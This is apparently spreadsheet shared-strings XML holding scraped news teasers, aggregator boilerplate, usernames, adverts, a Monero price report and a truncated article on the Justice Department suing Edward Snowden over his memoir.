BBC Breakfast airs on BBC One from 6am. Source link</t>
  </si>
  <si>
    <t>A tropical storm watch was posted on Sunday for Puerto Rico, the U.S. Virgin Islands and British Virgin Islands.</t>
  </si>
  <si>
    <t>Hannah Barry</t>
  </si>
  <si>
    <t>Laurie John Junior Dodd, 44, was arrested after he went on a rampage through Perth’s eastern suburbs in the early hours of Thursday morning.</t>
  </si>
  <si>
    <t>German Russian Hangman game – select either to guess the German or the Russian word from the head word in the other language. The word to guess is represented by a row of dashes, giving the number of letters. View the history of words used in the game and click on the list to show … Continue reading German Russian Hangman →</t>
  </si>
  <si>
    <t>‘They just don’t care’ – traffic warden gives man suffering medical episode a parking ticket Original Source A man living with an invisible illness has slammed Manchester council after claims he was slapped with a ticket for double parking during a medical episode. Joan Jover, 33, suffers with Chronic Pelvic Pain Syndrome and Spondyloarthritis, which makes it difficult for him to perform every day tasks and means he must take constant medication. The call centre worker from Sale had been driving home from a hospital appointment when he felt a sharp pain in his leg. Instead of causing a danger to other drivers by stopping on the road, Mr Jover says he pulled in to a nearby car park while he phoned for a friend to come and pick him up. Mr Jover claims that whilst he waited there, a traffic warden approached the car and began taking photographs, and filling out a form. Read More Speaking to the Manchester Evening News, he said: “I didn’t even get the chance to explain to the warden why I was there before he issued me with a ticket.” After being issued with the ticket and a £70 fine, Mr Jover wrote to the council explaining his medical condition, and why he had opted to stop there. Read more of today’s top stories He claims he was parked for no more than three minutes before being approached by the warden. “I told them I have a disability and that is why I stopped – I told them I thought it was the safest option,” he said. “I was angry, disappointed and furious that the traffic warden never gave me the chance to explain myself.” Mr Jover is embroiled in a row with Manchester City Council (Image: Manchester Evening News) He received a reply from Manchester City Council saying they were happy with the action of the officer and would be upholding their decision. Mr Jover has been diagnosed with Spondyloarthritis, a type of arthritis that attacks the spine and the joints of arms and legs. His condition means he receives regular hospital treatment, which Mr Jover believes he may have reacted badly to on the day in question. Read More “At the end of the day, it is not about the money, it is the fact that I think it’s completely unfair,” he said. “It is like they just don’t care.” To follow Sophie on Twitter click here. Or to like her Facebook page and keep up to date with breaking news click here. Here’s a link to the M.E.N.’s main Facebook page where we share our latest stories. A Manchester City Council spokesperson said: “Mr Jover was issued with a ticket after parking in a Resident Parking Zone without a permit. “He sent in a letter outlining mitigating circumstances, but did not provide any evidence to support the mitigation. “As a result, Mr Jover’s appeal was not upheld and a letter was sent to him explaining his further appeal rights. “At this stage, Mr Jover did not submit a further appeal and paid the amount owed for the ticket, meaning that his case was closed. “If Mr Jover can provide evidence to support his reason for parking in a restricted area, the council will review his case.” Get breaking news first on the free Manchester Evening News app – download it here for your Apple or Android device. You can also get a round-up of the biggest stories sent direct to your inbox every day with the MEN email newsletter – subscribe here. And you can follow us on Facebook here.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‘They just don’t care’ – traffic warden gives man suffering medical episode a parking ticket appeared first on Premier League. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>The strike against General Motors Co's U.S. operations has led to a parts shortage, the automaker said on Wednesday, and as a result it announced the temporary lay-offs of 1,200 workers at its Oshawa assembly plant in Canada.</t>
  </si>
  <si>
    <t>Super funds that attract the most complaints from members should pay more for disputes to be resolved, say not-for-profit funds.</t>
  </si>
  <si>
    <t>Aunt Lydia (played by Ann Dowd) is the brutal leader of the Red Centre in The Handmaid’s Tale, responsible for training young women to be Handmaids. As the Hulu series has gone on, viewers have found out more of her back story in dribs and drabs. However Margaret Atwood’s new book has now revealed all about why she became an Aunt. Why did Aunt Lydia become an Aunt? WARNING: This article contains spoilers for The Testaments In her sequel novel to The Handmaid’s Tale, Margaret Atwood delved deeper into the backstory of Aunt Lydia as a character. Called The Testaments, the book casts Lydia as one of three narrative protagonists along with June Osborne’s two daughters. The novel examines the growth of Lydia into Gilead’s most-feared woman and how she ended up there. After the Gileadean revolution begins, she was one of several colleagues rounded up and taken to a stadium. READ MORE: The Handmaid’s Tale season 4: June forms Gilead resistance movement? The Handmaid’s Tale: Why did Aunt Lydia become an Aunt? (Image: HULU) Once there, she was detained with the other women in a constant state of fear as she watched prisoners around her shot and killed. She stayed there for seven days before she was taken to a meeting with a Commander who determines that she is not pious enough. This led her to be placed in solitary confinement and beaten brutally. She was then taken quite suddenly to a luxurious hotel room and given a choice over whether she wanted to cooperate or face more punishment. Lydia decided to cooperate and went on to become an Aunt in the new regime. READ MORE: The Handmaid’s Tale season 4: Will Aunt Lydia introduce Pearl Girls? The Handmaid’s Tale: What was revealed about her story? (Image: HULU) This came in stark contrast with her colleague Anita who decides to die rather than become part of Gilead. However, Lydia’s motives were initially ambiguous until it became clear that she wanted to take down the regime from the inside. Speaking about the revelations of her character, actor Ann Dowd who plays her in the television adaptation spoke to The Hollywood Reporter. She said: “What surprised me — and didn’t — is how [Aunt Lydia] got involved in Gilead in the first place. “When you play a role such as Lydia in The Handmaid’s Tale, you search for a human connection that somehow explains why she would make the choices she makes. READ MORE: The Handmaid’s Tale season 4 release date, cast, trailer, plot The Handmaid’s Tale: In the series, Aunt Lydia used to be a teacher (Image: HULU) She added: ”Now, you read The Testaments, and Lydia, being a family court judge, realised really quickly, ‘If I want to live and survive this world, this is what you have to do. “’Not only am I going to do it, I’m going to do it better than anybody so I’m going to be ruling the other Aunts’.” Fans of the television show will know that this is a lot more detail than has been provided so far. In fact it was only in season three that viewers were given more insight into her backstory through a number of flashbacks. In episode eight, Unfit, it is revealed that Lydia used to be a teacher. READ MORE: Handmaid’s Tale: Has The Testaments changed the show’s ending? The Handmaid’s Tale: Will this be explored in the show? (Image: HULU) During the episode, viewers saw her invite a young boy named Ryan (Ian Ho) and his mother Noelle (Emily Althaus) to have dinner at her house. She befriended the pair and offered them her support before Noelle urged her to go on a date with her headteacher (John Ortiz). This ended up with her facing a rejection from him in a sexual situation, which sent her spiralling into a more religiously devout woman. She is then ultimately gave up Noelle to the regime for bad mothering, showing hints of the brutal woman she is to become. Give that Hulu and MGM have already signed up to adapt the latest novel for television, it will be interesting to see how they explore this new side of Lydia. The Handmaid’s Tale seasons 1-3 are available to stream on Hulu. Source link</t>
  </si>
  <si>
    <t>Arabic Malay Dictionary – travel dictionary to translate Arabic to Malay. Click on the list to show Arabic or Malay synonyms to understand the broader use of the words. The learning games help to build vocabulary. View the history of words used in the game again clickable for synonyms. Ideal for travelers, business people or … Continue reading Arabic Malay Dictionary →</t>
  </si>
  <si>
    <t>Barbash is the inspiration behind Ramona, one of the film’s protagonists See full article at Independent.co.uk » The post Hustlers: Real-life woman portrayed by Jennifer Lopez says star ‘betrayed’ her in ‘inaccurate’ movie appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>In 2011 a statue was built depicting two of Scotland's great comedians - but has never left storage. The post Billy Connolly: Will the Big Yin’s statue ever find a home? appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>ZIP</t>
  </si>
  <si>
    <t>MUI: “And the unemployment rate among blacks, that dropped to 5.5 percent and is now at the lowest level on record.”</t>
  </si>
  <si>
    <t>The White House says Iraqis who helped the US military and persecuted minorities will get priority. The post US slashes refugee limit to all-time low of 18,000 appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>Man City fans’ player ratings for first four games of the Premier League season Original Source Manchester City fans can’t separate Sergio Aguero and Kevin de Bruyne for their performances in the first four games of the new season. City have started well, earning ten points and scoring 14 goals. Only a late VAR decision against Tottenham denied them a maximum return from the opening four fixtures. Central to their form has been Aguero, scorer of six goals, and De Bruyne, who returns after an injury-hit campaign last term. The Belgian has started every game, providing five assists and one goal. Such impressive returns from the pair have earned an average of 9/10 ratings from fans when MEN Sport asked fans to give each player this season a score out of ten. David Silva has occupied the second central midfield spot beside De Bruyne, and fans ranked him third highest this season with a score of 8.7. Raheem Sterling, who has scored five goals in four games, is ranked fourth with 8.6. Read More New record signing Rodri has started well in defensive midfield, and is the fifth player with a score higher than 8 (8.1/10). Six other players scored over 7/10, as Aymeric Laporte, Ederson, Riyad Mahrez, Kyle Walker, Bernardo Silva and Oleks Zinchenko were recognised for their efforts. At the bottom of the rankings were Joao Cancelo and Phil Foden, who have only featured off the bench. John Stones and Fernandinho also received relatively low scores, but both have featured sparingly as a result of injury and lack of fitness. Read More Full player ratings from Man City fans: Sergio Aguero – 9.0 Kevin de Bruyne – 9.0 David Silva – 8.7 Raheem Sterling – 8.6 Rodri – 8.1 Aymeric Laporte – 7.8 Ederson 7.7 Riyad Mahrez – 7.6 Kyle Walker – 7.5 Bernardo Silva – 7.2 Oleks Zinchenko – 7.1 Gabriel Jesus – 6.9 Nicolas Otamendi – 6.7 Ilkay Gundogan – 6.6 Fernandinho – 6.3 John Stones – 5.6 Phil Foden – 5.3 Joao Cancelo – 4.6 Give your own ratings to City players here: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 City fans’ player ratings for first four games of the Premier League season appeared first on Premier League. Follow us on our social networks Posted on Bible Of Sport Bible Of Sport - Instagram Bible Of Sport - Twitter Bible Of Sport - Facebook Source link</t>
  </si>
  <si>
    <t>PEOPLE working in businesses near Townsville’s most dangerous intersection say it’s so bad they now expect accidents to happen.</t>
  </si>
  <si>
    <t>Twelve people are killed in one of the most lethal attacks since the collapse of the Islamic State's self-declared caliphate.</t>
  </si>
  <si>
    <t>The Foreign Office confirms it is in contact with local authorities following the incident. Read more? Click here</t>
  </si>
  <si>
    <t>Golf ball technology company OnCore revealed plans to build a $30 million sports and entertainment facility along the Buffalo River in its hometown of Buffalo, New York. Source: Sports Business News</t>
  </si>
  <si>
    <t>Body bags are sent to areas of the Bahamas worst hit by Hurricane Dorian as hundreds remain missing. The post Hurricane Dorian: Bahamas death toll expected to be ‘staggering’ appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>Every Friday whilst Strictly Come Dancing is gracing our TVs the Tele is giving you the chance to cash in!</t>
  </si>
  <si>
    <t>B.S. [Bernie Sanders] today Said the rich can afford to pay For everything swell (For illegals as well)… 0 0</t>
  </si>
  <si>
    <t>French economist’s Capital and Ideology expands on themes in Capital in the 21st Century, which sold 2m copies Six years after being catapulted to fame with a blockbuster about the concentration of wealth, the French economist Thomas Piketty has returned with a new magnum opus.Abiding by the rule that every bestseller demands a follow-up, Capital and Ideology expands on the themes sketched out in Capital in the 21st Century, which sold 2m copies worldwide after its publication in 2013. Continue reading… Read More</t>
  </si>
  <si>
    <t>Overseas backpackers are flooding back to Australia to fill critical jobs in regional industries following a government overhaul of the visa system.</t>
  </si>
  <si>
    <t>http://www.woltersworld.com Berlin, the capital of Germany, the city has so much to offer and here we give you our 10 favorite places to visit in Berlin, from the Weltzeituhr at Alexanderplatz to the Brandenburg Gate and Potsdam. A great weekend getaway or longer. Filmed in Berlin, Germany at the Charlottenburg Palace Copyright Mark Wolters 2014 The post Visit Berlin – The Top 10 Sites in Berlin, Germany appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>Maryam Shah</t>
  </si>
  <si>
    <t>The Greens are calling it a violation of the"democratic principle of full and fair debate on election issues" and demanding that TVA "respect the inclusion criteria established by the Leaders' Debates Commission."</t>
  </si>
  <si>
    <t>DEATH IN PARADISE fans were sad to see Danny John-Jules step down from the BBC drama last year. However now the star has revealed Dwayne Myers may be back on our screens very soon. Daily Express :: TV and Radio Feed</t>
  </si>
  <si>
    <t>Billionaire vacuum cleaner inventor Sir James Dyson says his school set him on the road to success. Read more? Click here</t>
  </si>
  <si>
    <t>Image Courtesy Jean Hailes Foundation IT is all about women as the nations attention focusses on women’s health and wellbeing and the celebration of Women’s Health Week Jean Hailes for Women’s Health is Australia’s leading and most trusted women’s health organisation are a national not-for-profit organisation dedicated to improving women’s health. This year, in Womwnes Health Week, the team at Jean Hailes are focussing on five key areas of women’s health that need some extra attention. “Women’s Health Week is your week to dive into the world of women’s health, to learn more and be inspired to make healthier choices. So, take a ‘time-out’ just for yourself, pop the kettle on and listen to what we’ve got in store!” The five day program is as below Day 1 : Mighty Movement Day 2 : Bathroom Boss Day 3 : Reporductive Health Day 4 : Treasure Chest Day 5 : Mastering Your Mind Check out the Jean Hailes website, and get involved at https://www.womenshealthweek.com.au or follow them on social media at: Twitter : @JeanHailes Facebook : @JeanHailesforWomensHealth Instagram: @jeanhailes/ YouTube : @JeanHailesFoundation The post Women’s Health Week appeared first on Women’s Sport Network.</t>
  </si>
  <si>
    <t>Thomas Cook employees such as Ella Waine, pictured in her uniform, react to the company’s collapse. Read more? Click here</t>
  </si>
  <si>
    <t>It’s not all just Marvel, Pixar and Star Wars stuff See full article at Independent.co.uk » The post Disney+: 10 surprising movies and TV shows announced to join streaming service appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>HOLIDAYS often see Britons withdrawing foreign currency for their trip away and hoping they’ll get a good exchange rate. Travellers sometimes return with leftover travel money – an expert has revealed how to make the most of this cash. Daily Express :: Travel Feed</t>
  </si>
  <si>
    <t>She was on trial for entering a football stadium disguised as a man – a punishable offence in Iran. The post Iran’s ‘blue girl’ dies after setting herself on fire appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>The initial reception for a re-launched version of a classic video game points to potential stock price growth of Activision Blizzard Inc, with new titles from key franchises also bolstering the company's outlook, according to Barron's.</t>
  </si>
  <si>
    <t>A Medical support services boss contracted for a dance festival attended by 30,000 and where two revellers collapsed and died after taking MDMA admitted his team was prepared for only one drug overdose at a time.</t>
  </si>
  <si>
    <t>The outlaw motorcycle gang life comes with some significant risks.</t>
  </si>
  <si>
    <t>Archaeologists uncover the first evidence that our prehistoric ancestors in Europe weaned their infants much the way we do now, using specialised baby bottles to feed them animal milk.</t>
  </si>
  <si>
    <t>Top lightweight prospect Islam Makhachev faces Davi Ramos on the pay-per-view portion of Saturday’s UFC 242 fight card, which streams on ESPN+. Source: Sports Business News</t>
  </si>
  <si>
    <t>Monero (CURRENCY:XMR) traded 4.1% higher against the dollar during the one day period ending at 9:00 AM Eastern on September 6th. Monero has a market cap of $1.36 billion and approximately $64.80 million worth of Monero was traded on exchanges in the last 24 hours. In the last seven days, Monero has traded up 17.1% against the dollar. One Monero coin can currently be bought for $79.11 or 0.00727852 BTC on major cryptocurrency exchanges including BTC-Alpha, Bisq, Cryptomate and OKEx. Here’s how similar cryptocurrencies have performed in the last 24 hours: Bytecoin (BCN) traded 6.7% higher against the dollar and now trades at $0.0005 or 0.00000005 BTC. Aeon (AEON) traded down 4.1% against the dollar and now trades at $0.58 or 0.00005331 BTC. Boolberry (BBR) traded up 2% against the dollar and now trades at $0.43 or 0.00003969 BTC. DigitalNote (XDN) traded down 4.5% against the dollar and now trades at $0.0007 or 0.00000007 BTC. BitNewChain (BTN) traded up 0.2% against the dollar and now trades at $0.0141 or 0.00000130 BTC. BitTube (TUBE) traded 5.8% higher against the dollar and now trades at $0.0124 or 0.00000115 BTC. Stellite (XTL) traded up 3.2% against the dollar and now trades at $0.0002 or 0.00000004 BTC. Digital Insurance Token (DIT) traded down 2.2% against the dollar and now trades at $0.0031 or 0.00000028 BTC. Karbo (KRB) traded up 11.9% against the dollar and now trades at $0.0719 or 0.00000660 BTC. Sumokoin (SUMO) traded down 0.2% against the dollar and now trades at $0.0384 or 0.00000353 BTC. Monero Profile Monero is a proof-of-work (PoW) coin that uses the CryptoNight hashing algorithm. It launched on June 2nd, 2014. Monero’s total supply is 17,194,227 coins. Monero’s official website is www.monero.cc. The official message board for Monero is forum.getmonero.org. The Reddit community for Monero is /r/monero and the currency’s Github account can be viewed here. Monero’s official Twitter account is @monerocurrency and its Facebook page is accessible here. According to CryptoCompare, “Ring Signature The Basics In cryptography, a ring signature is a type of digital signature that can be performed by any member of a group of users that each have keys. Therefore, a message signed with a ring signature is endorsed by someone in a particular group of people. One of the security properties of a ring signature is that it should be computationally infeasible to determine which of the group members’ keys was used to produce the signature. For instance, a ring signature could be used to provide an anonymous signature from “a high-ranking White House official”, without revealing which official signed the message. Ring signatures are right for this application because the anonymity of a ring signature cannot be revoked, and because the group for a ring signature can be improvised (requires no prior setup). Application to Monero A ring signature makes use of your account keys and a number of public keys (also known as outputs) pulled from the blockchain using a triangular distribution method. Over the course of time, past outputs could be used multiple times to form possible signer participants. In a “ring” of possible signers, all ring members are equal and valid. There is no way an outside observer can tell which of the possible signers in a signature group belongs to your account. So, ring signatures ensure that transaction outputs are untraceable. Moreover, there are no fungibility issues with Monero given that every transaction output has plausible deniability (e.g. the network can not tell which outputs are spent or unspent). To read how Monero gives you privacy by default (unlinkability), see stealth addresses. “ Buying and Selling Monero Monero can be purchased on the following cryptocurrency exchanges: BTC Trade UA, LiteBit.eu, Coinbe, Bittrex, Bithumb, Poloniex, Exmo, Instant Bitex, CoinEx, Tux Exchange, HitBTC, Kraken, Braziliex, Gate.io, Coindeal, Ovis, OKEx, BitBay, OpenLedger DEX, Bitbns, Exrates, Trade Satoshi, Coinroom, SouthXchange, Liquid, Binance, Graviex, Huobi, Cryptopia, Upbit, Waves Decentralized Exchange, Crex24, Livecoin, Bitfinex, B2BX, Bisq, BTC-Alpha, DragonEX, Coinut, Cryptomate, TradeOgre, Stocks.Exchange, Bitlish, Nanex and Mercatox. It is usually not presently possible to buy alternative cryptocurrencies such as Monero directly using U.S. dollars. Investors seeking to trade Monero should first buy Ethereum or Bitcoin using an exchange that deals in U.S. dollars such as Changelly, Coinbase or GDAX. Investors can then use their newly-acquired Ethereum or Bitcoin to buy Monero using one of the aforementioned exchanges. Receive News &amp; Updates for Monero Daily – Enter your email address below to receive a concise daily summary of the latest news and updates for Monero and related cryptocurrencies with MarketBeat.com’s FREE CryptoBeat newsletter.</t>
  </si>
  <si>
    <t>South Korea has recorded a boost in sales of high-tech audio and video devices, following a new law that encourages employees to secretly record alleged abuse or harassment by their bosses.</t>
  </si>
  <si>
    <t>dynasty711</t>
  </si>
  <si>
    <t>Good price for a office multitasking monitor, more adjustment options comparing to VA2719-2K. Original Coupon Deal</t>
  </si>
  <si>
    <t>Sessions will offer innovative ways to integrate the products into your practice The post Advisor’s Edge to co-host ETF Summit on Oct. 1 appeared first on Advisor.</t>
  </si>
  <si>
    <t>philpy2016</t>
  </si>
  <si>
    <t>40% OFF ANY SCOTCH FILLET LINES - YOU CHOOSE - 48HRS Kiss the long cold winter goodbye to an absolute belter of a springtime scotch fillet special. Until midnight Thursday only we are offering up a whopping 40% OFF the retail price of all our scotch fillet lines. So dust off your BBQs and get cooking ! Enter discount code SCOTCH at the end of the checkout process to receive your 40% off. Scotch fillet special 40% OFF choices are: • 2 x 200g • 2 X 250g • 2 x 300g • 1 x 1.2kg scotch roast • 6 x 300g (packed 2 per packet) • 2kg scotch fillet roast (ideal for baking or slicing yourself) No minimum order Your scotch fillet steaks are cryovaced with 21 days used by date on them for the fridge or 6 months in the freezer 40% OFF ANY SCOTCH LINE UNTIL MIDNIGHT THURSDAY www.suttonforestmeatandwine.com.au</t>
  </si>
  <si>
    <t>Three current and former bosses are accused of market manipulation by not informing investors earlier. The post Volkswagen top executives charged over diesel emissions scandal appeared first on NoPartySystem.Com.</t>
  </si>
  <si>
    <t>The owner of the Buckingham Arms – which had its beginnings as a hotel in the 1840s – want the site rezoned to pave the way for a housing or aged-care development.</t>
  </si>
  <si>
    <t>Documents show that US immigration services use free online translation tools to vet social media. The post US uses Google Translate to vet refugees appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>A BRIDGWATER businessman has walked away with four awards for his work helping people with learning disabilities make the most of digital technology. Read more? Click here</t>
  </si>
  <si>
    <t>Laura Tingle</t>
  </si>
  <si>
    <t>The Government should beware the folly of becoming too absorbed in the do-or-die politics of a bad number, writes Laura Tingle.</t>
  </si>
  <si>
    <t>New York City is one of the most popular cities in the USA. Part of that is thanks to many popular places located here. We are here to show you all the destinations to visit, from the breathtaking skylines to the relaxing parks. Empire State Building The influential Empire State Building offers unobstructed scenic views of New York City. You cannot be in NYC without having a look at its skyline from this point of view. It is absolutely a must. The view is stunning from every side of the building. In addition, while here, you will learn about the history of the building’s construction. In particular, it is very much worth it at the sunset. All things considered, there is no reason to miss visiting this amazing building. The Empire State Building reaches incredible heights. The Metropolitan Museum of Art New York City’s most visited attraction has thousands of years of art inside. There is a wonderful reconstructed temple from Aswan. There are all sorts of different pieces of art here. From Van Gogh to Picasso. The Greek and Egyptian sectors are amazing. The Africa, Oceania and Americas galleries are also a delight. The museum is great if you’re visiting with your family. So here’s everything you need to know about moving to NYC with a family. This museum is full of art from around the world. Therefore, it is one of the best destinations to visit in New York. Central Park is definitely one of the destinations to visit You’ve most likely heard of Central Park. It is one of the things New York is best-known for. It is an amazing place for a workout. You can also sit down and enjoy nature. Here, there’s something for everyone. You can sunbathe on the grass or have a quiet picnic. You can admire the arboretum or sit in the shade and read. Moreover, you can enjoy the iconic food of NYC while relaxing on a bench. The park is also one of the ways people can enjoy retirement in NYC. Furthermore, there is a clock tower and a small zoo nearby. In conclusion, Central Park is one of the best destinations to visit in New York. Central Park is a place where you can read a book and relax. New York Public Library Two marble lions mark the entrance of this historic landmark. It features over six million books. Quite the bookworm haven. The architecture of the building is amazing. In addition, there is actually a Winny the Pooh exhibit. If you are moving to NYC with kids, be sure to bring them here. Moreover, the inside of the library is beautiful with the woodwork and the murals. It is a quiet hideaway from the hustle of Manhattan. It also has a gift shop that offers a very good selection. Be sure to visit this intellectually mesmerizing library. Manhattan Skyline The Manhattan Skyline is probably the best skyline in the world. But to see the beauty of the forest, get outside to get a good look. Cruising along the Hudson River will give you a fantastic view of the skyline and the Statue of Liberty. Additionally, you will be able to get some great photos when viewing from Governor’s Island. There are skyscrapers all over but they don’t look congested. They actually define the city. Roosevelt Island offers a good view at night. Moreover, it has great restaurants for a quiet dinner. The stunning architecture here makes it impossible not to mention. The skyscrapers make it an astounding destination to visit in NYC. The skyline of Manhattan looks stunning from far away. Intrepid Sea, Air &amp; Space Museum The American military history museum features a collection of museum ships. The museum was established in 1982. It is amazing to stay side by side with a space shuttle. Additionally, you can play the VR experience in it. The ticket also includes a visit to a nuclear submarine. The museum consists of several levels of an aircraft carrier. There are many planes on display and other exhibits scattered throughout. The museum is very spacious. There is also a pleasant view of the sky as well as the river. Moreover, you can see the 3D Aircraft Carrier movie. There are some really interesting exhibitions on WW2, Vietnam, Cold War, and Apollo missions. And don’t miss the Growler submarine. It is a really fascinating exhibit that brings to life the confined space within these vessels. The history within the Intrepid Sea makes it one of the best destinations to visit in NYC. Grand Central Terminal Do not be fooled, this is a lot more than a train station. It’s more like a multi-variety shopping center with train access. It has so many various bakeries. It’s worth a walk into the main hall. The architecture and ceiling are glamorous. Moreover, it has a classy and historic design. But do go in twice, as it looks different at nighttime. The terminal and toilets are also very clean. The terminal is a perfect blend between balance and function. This enormous tastefully built terminal will not disappoint. St. Patrick’s Cathedral St. Patrick’s Cathedral is the seat of New York’s archbishop. No one can ignore the beauty of this classic cathedral and the graceful artwork and carvings it contains. Be reverent and appreciate your surroundings. Religious or not, St. Patrick’s Cathedral is certainly worth a visit. Everything about the building, the stained glass windows, the relics, and shrines will amaze you. Coupled with the fact that it was recently refurbished, it might very well be the best cathedral in New York. In addition, there is a little shop where you can purchase religious items. You can also take the audio tour. It will show you what the cathedral has within itself, as well as how much meaning everything really has. Most importantly, you can view the cathedral for free. But you can still make donations. The post Destinations to visit after moving to New York City appeared first on nycmoving.us.</t>
  </si>
  <si>
    <t>INSTAGRAM http://statigr.am/oranse FACEBOOK http://www.facebook.com/mulletrun TWITTER http://twitter.com/themulletrun Beach Shark Fishing. Hybrid Shark Caught. Breaking News, Epic conditions as you can see in the video and Payam caught a very nice Blacktip stark. The shark broke the line as soon as it hit the sand. You can see in the video that the shark is wrapped in […] The post EXTREME Shark Fishing on Crowded Beach appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>A man blinded in one eye after an acid attack has regained his sight after pioneering surgery. The post Acid attack victim regains sight via new surgery appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>Brunswicks</t>
  </si>
  <si>
    <t>In April, Lauren wrote an editorial on vaccines ahead of World Immunisation Week, discussing data released by Unicef on the slump to the measles vaccine uptake. We have hosted many more stories on the matter since then, and each time the news is worse. We are now at the point where GPs are calling for the MMR vaccine to be made compulsory to prevent an epidemic of measles and mumps. They have even gone so far as to say that schools should not accept pupils until it has been proven that they are up to date with their vaccines. The Health Secretary Mr. Hancock has declined to respond to the call at this time. The UK has lost its measles-free status; the reason by GPs for the call to make the vaccine mandatory is very clear. Whilst some parents may not have not kept up to date with vaccinations for their children, it seem that the majority of parents who have refused to have their children immunized have done so because they have a conscious objection to vaccines. However, perhaps some parents prefer to ‘err on the side of caution’ and not vaccinate, or they may not feel that the vaccine is necessary. I decided to get my son vaccinated because I wanted him to be protected. Until the late 90s, I would say that routine vaccinations were all simply done as a matter of course. I received all of my vaccinations as did my siblings and no questions were asked. However, since the report by Andrew Wakefield suggesting a link to autism in 1998, the full retraction of his report in 2010 by the General Medical Council and the convenience of the internet, parents are more engaged and are doing more research on vaccinations than ever before – but there is a lot of bad information available as well as good, valid research. World Health Organisation data tells us that by August of this year there had been 3 times as many reported cases of measles compared with the same period of the previous year. It also tells us that between 2000 and 2017, the measles vaccination resulted in a 80% drop in measles deaths worldwide. So if you know someone who is on the fence about vaccines, please do what you can to help point them to credible sources of information. Ask them to go to their GPs for a chat if they want to know more, or especially if they don’t think they have been immunised.</t>
  </si>
  <si>
    <t>Chris Chacon</t>
  </si>
  <si>
    <t>The City of Edmonton has recently lifted the cap on how many chicken coops are allowed in its urban chicken program.</t>
  </si>
  <si>
    <t>Looking for A-Z owner Operator and Company Drivers for local and US Runs. Dedicated out bound. Pay- City driver $23/hr, 60-70 hours every week. Hwy- 0.65/miles Owner Operator 15% deduction. Company provide trailer and parking. Must have 3 years of experience with clean record. Please contact Mohit-905-228-3131 or Suman- 647.. Read more</t>
  </si>
  <si>
    <t>Source: https://www.theverge.com/2019/9/2/20843292/parrot-anafi-fpv-folding-drone-goggles-dji Parrot’s newest drone comes with smartphone-powered FPV goggles Images: Parrot Parrot’s latest iteration on its flagship Anafi drone is all about immersion. The new Anafi FPV (for first person view) is being sold as a package with a headset that puts pilots in their drone’s perspective. But instead of a dedicated screen inside the goggles, Parrot’s approach is to have users slot a smartphone in, similar to headsets like the Samsung Gear VR or Google Cardboard. The Anafi FPV package will cost $799 when it goes on sale later this month. It will include the drone, the glasses, a controller, extra propellers, a battery, a 16GB microSD card, and a USB-C cable. The Anafi FPV also comes with a new backpack that Parrot says can “double as a stable platform” for launching the drone. FPV drones are experiencing a bit of a… Continue reading… Source: https://www.theverge.com/2019/9/2/20843292/parrot-anafi-fpv-folding-drone-goggles-dji The post Parrot’s newest drone comes with smartphone-powered FPV goggles appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>WASHINGTON — The Justice Department sued the former intelligence contractor Edward Snowden on Tuesday, seeking to seize his proceeds from his new memoir because he did not submit the manuscript for review before it was published so officials could make sure it contained no classified information. Mr. Snowden, whose 2013 leaks of top-secret documents about National Security Agency programs set off a worldwide debate about government surveillance in the internet era, published the memoir, “Permanent Record,” on Tuesday. He recounts his life up to the disclosures, including how he came to be alarmed by the growth of the security agency’s surveillance capabilities — such as its then-secret systematic collection of logs of Americans’ domestic phone calls — and how he copied the documents and provided them to reporters. In the lawsuit, the Justice Department complained that by publishing the book, Mr. Snowden violated his legal obligation to let censors at the C.I.A. and the N.S.A. vet the manuscript first, and so he had to forfeit any profits. As a condition of receiving access to classified information, Mr. Snowden had signed nondisclosure agreements promising to submit to the review system any future writings related to his work for the agencies. “Intelligence information should protect our nation, not provide personal profit,” G. Zachary Terwilliger, the United States attorney for the Eastern District of Virginia, where the department filed the case, said in a statement. “This lawsuit will ensure that Edward Snowden receives no monetary benefits from breaching the trust placed in him.” [Read the complaint.] In 2013, Mr. Snowden was charged in that same district with violations of the Espionage Act, which outlaws the disclosure of potentially harmful national security information to someone not authorized to receive it. But the case against him has not proceeded because Mr. Snowden has since been living as a fugitive in Russia, and the Russian government granted him asylum. Mr. Snowden hoped the lawsuit would attract more attention to the book, which aimed “to continue a global conversation about mass surveillance and free societies that his actions helped inspire,” an American Civil Liberties Union lawyer who represents him, Ben Wizner, said in a statement. Mr. Wizner also said that the book contained no classified information that the news media had not previously published. “Had Mr. Snowden believed that the government would review his book in good faith, he would have submitted it for review,” Mr. Wizner said. “But the government continues to insist that facts that are known and discussed throughout the world are still somehow classified.” In the lawsuit, the Justice Department also complained that Mr. Snowden had been paid for giving speeches without submitting his planned remarks for prepublication review, and said he should be ordered to turn over those profits as well. The lawsuit also named Mr. Snowden’s publisher, Macmillan, as a defendant, but said it was seeking only to prevent the company from paying royalties to Mr. Snowden that should now instead be turned over to the federal government. Mr. Snowden has been hailed as a whistle-blower by privacy and civil liberties advocates, while denounced as a traitor by national security officials. His disclosures prompted reforms. Among them, Congress ended in 2015 the N.S.A.’s collection of logs of Americans’ phone records. It set up an alternative system where the bulk records remain with phone companies and the agency, with a court’s permission, may access certain logs for counterterrorism analysis. The agency has since shut down that program as well, and it is not clear if lawmakers will extend a law authorizing it that is set to expire soon. Mr. Snowden has said he will not voluntarily return to the United States because he cannot get a fair trial, in his view. In an interview on CBS on Monday, he reiterated that the law would prevent him from arguing to jurors that they should acquit him of violating the Espionage Act because he was a whistle-blower making disclosures in the public interest. Officials and contractors who seek security clearances routinely agree to submit writings that relate to their work for prepublication review. The censorship system traces back to limits imposed on a handful of C.I.A. officials in the 1950s and has since ratcheted up to cover many more people and agencies. In a 1980 ruling, Snepp v. United States, the Supreme Court permitted the C.I.A. to seize the proceeds from a former officer who published a book without submitting it to the agency for such review. Mr. Wizner noted that in April, a group of former national security officials filed an unusual constitutional lawsuit challenging the system as “dysfunctional” in a way they said 